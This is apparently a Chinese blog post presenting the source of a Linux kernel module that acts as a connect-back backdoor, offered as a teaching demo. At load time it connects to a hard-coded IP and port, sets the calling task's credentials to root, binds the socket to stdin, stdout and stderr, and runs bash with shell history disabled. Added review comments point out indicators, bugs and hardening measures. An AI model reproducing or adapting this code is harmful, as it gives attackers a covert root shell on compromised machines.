
一个简单的内核后门原型

2007-10-25 17:41 302 查看
这是一个在内核模块中实现的反连后门,大家看看这与应用层上的实现有什么不同吧,呵呵

/*

* Kernel mode connect backdoor,haha~

*

* just a demo module to teach you how to write a backdoor in kernel mode,

* i believe you can add more code to make it strong and powerful,wulala.

*

* by wzt <wzt#xsec.org>

*

*/

#include <linux/module.h>

#include <linux/kernel.h>

#include <linux/socket.h>

#include <linux/net.h>

#include <linux/in.h>

#include <linux/fs.h>

#include <linux/file.h>

#include <linux/types.h>

#include <linux/errno.h>

#include <linux/string.h>

#include <linux/unistd.h>

#include <net/sock.h>

#include <asm/uaccess.h>

#include <asm/unistd.h>

#include "syscalls.h"

/*
 * Hard-coded connection target and shell parameters for this demo. For a
 * defender these constants are the static indicators of the sample: a fixed
 * destination address and port, a bash argv that skips start-up files, and
 * an environment that turns off shell history.
 */

/* Destination address handed to in_aton() in k_connect(); 192.168.0.0/16 is
 * private (RFC 1918) address space. */
#define REMOTO_IP "192.168.75.1"

/* Destination TCP port, passed through htons() in k_connect().
 * NOTE(review): a lower-case macro named `port` also rewrites any later
 * identifier spelled `port`. */
#define port 1080

MODULE_LICENSE("GPL");

MODULE_AUTHOR("wzt");

/* my_syscall2 comes from the project-local "syscalls.h", which is not shown;
 * presumably it expands to a dup2() wrapper callable from module code —
 * TODO confirm against that header. */
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);

/* argv for the spawned shell; --noprofile and --norc make bash skip its
 * start-up files. */
static char *earg[4] = { "/bin/bash", "--noprofile", "--norc", NULL };

/* Environment passed to execve() in k_connect(). Not static, so the symbol
 * `env` has external linkage in the module. */
char *env[]={

"TERM=linux",

/* HOME is a macro that is not defined in the visible source (presumably in
 * syscalls.h — confirm). */
"HOME=" HOME,

"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin"

":/usr/local/sbin",

/* Keeps bash from saving command history to a file; an anti-forensics
 * indicator that can be matched in /proc/<pid>/environ. */
"HISTFILE=/dev/null",

NULL };

/*
 * k_connect - open a TCP connection to REMOTO_IP:port from module code,
 * duplicate the socket onto fds 0, 1 and 2 of the current task, set that
 * task's uid/euid/egid to 0 and call execve() on bash.
 *
 * Operates on `current`. The only caller visible here is k_socket_init(),
 * the module init hook, so `current` is presumably the process that loaded
 * the module — confirm for any other call site.
 *
 * Return: -1 when socket creation, fd mapping or connect fails; 1 after the
 * execve() call returns.
 *
 * What a defender can observe from this function: the printk() strings below
 * in the kernel log, an outbound TCP connection to the hard-coded address
 * owned by the loading process, direct writes to the task's credential
 * fields, and a bash process whose stdin, stdout and stderr are one socket.
 *
 * The direct tsk->uid/euid/gid/egid fields and set_fs() only exist on older
 * kernels (credentials later moved into struct cred and set_fs() was removed
 * from mainline), so this is a historical sample.
 */
int k_connect(void)

{

struct task_struct *tsk = current;

/* NOTE(review): newsock is declared but never used. */
struct socket *sock,*newsock;

struct sockaddr_in server;

int sockfd,i;

int error = 0,len = sizeof(struct sockaddr);

/* Raises the address limit so kernel pointers pass user-access checks. The
 * previous limit is not saved and is never restored in this function. */
set_fs(KERNEL_DS);

error = sock_create(AF_INET,SOCK_STREAM,0,&sock);

if (error < 0) {

printk("[-] socket_create failed: %d\n",error);

/* NOTE(review): sock has no initializer, so on this failure path the value
 * released here may be indeterminate — confirm what sock_create() leaves
 * in *res on error. */
sock_release(sock);

return -1;

}

/* Installs the socket in the current task's file-descriptor table. */
sockfd = sock_map_fd(sock);

if (sockfd < 0) {

printk("[-] sock_map_fd() failed.\n");

sock_release(sock);

return -1;

}

/* Zero the padding bytes, then fill in family, address and port. */
for (i = 0; i < 8; i++)

server.sin_zero[i] = 0;

server.sin_family = PF_INET;

server.sin_addr.s_addr = in_aton(REMOTO_IP);

server.sin_port = htons(port);

/* Calls the protocol's connect operation directly, with the file's flags. */
error = sock->ops->connect(sock,(struct sockaddr *)&server,len,sock->file->f_flags);

if (error < 0) {

printk("[-] connect to %s failed.\n",REMOTO_IP);

/* NOTE(review): neither the socket nor sockfd is released on this path, so
 * the descriptor stays open in the current task. */
return -1;

}

printk("[+] connect to %s ok.\n",REMOTO_IP);

/* Repeats the set_fs() call made at the top of the function. */
set_fs(KERNEL_DS);

/* Writes the credential fields of the current task in place. */
tsk->uid = 0;

tsk->euid = 0;

/* NOTE(review): gid is set to 0x11111111 while the other three fields are 0;
 * the reason is not visible here. The value is a distinctive indicator. */
tsk->gid = 0x11111111;

tsk->egid = 0;

/* Point stdin, stdout and stderr at the socket; return values are ignored. */
dup2(sockfd,0);

dup2(sockfd,1);

dup2(sockfd,2);

/* execve is not declared in the visible source (presumably provided by
 * syscalls.h — confirm). Its result is ignored. */
execve(earg[0], (const char **) earg, (const char **) env);

return 1;

}

/*
 * k_socket_init - module entry point; logs a start message and calls
 * k_connect().
 *
 * NOTE(review): declared int but contains no return statement, and the
 * result of k_connect() is discarded, so the status handed back to the
 * module loader is indeterminate. Whether the load reports success, and so
 * whether the module stays listed, cannot be predicted from this code.
 */
int k_socket_init(void)

{

/* This string in the kernel log marks the load attempt. */
printk("[+] kernel socket test start.\n");

k_connect();

}

/*
 * k_socket_exit - module exit hook; only logs a message. Nothing created in
 * k_connect() (socket, file descriptors, credential changes) is undone here.
 */
void k_socket_exit(void)

{

printk("[+] kernel socket test over.\n");

}

/*
 * Register the load and unload hooks. The network connection and shell are
 * started from the init hook, i.e. at module load time.
 *
 * Loading a module requires CAP_SYS_MODULE. Hardening that applies to this
 * class of code: enforce module signature verification, set the
 * kernel.modules_disabled sysctl once boot-time modules are loaded, and
 * audit the init_module/finit_module system calls.
 */
module_init(k_socket_init);

module_exit(k_socket_exit);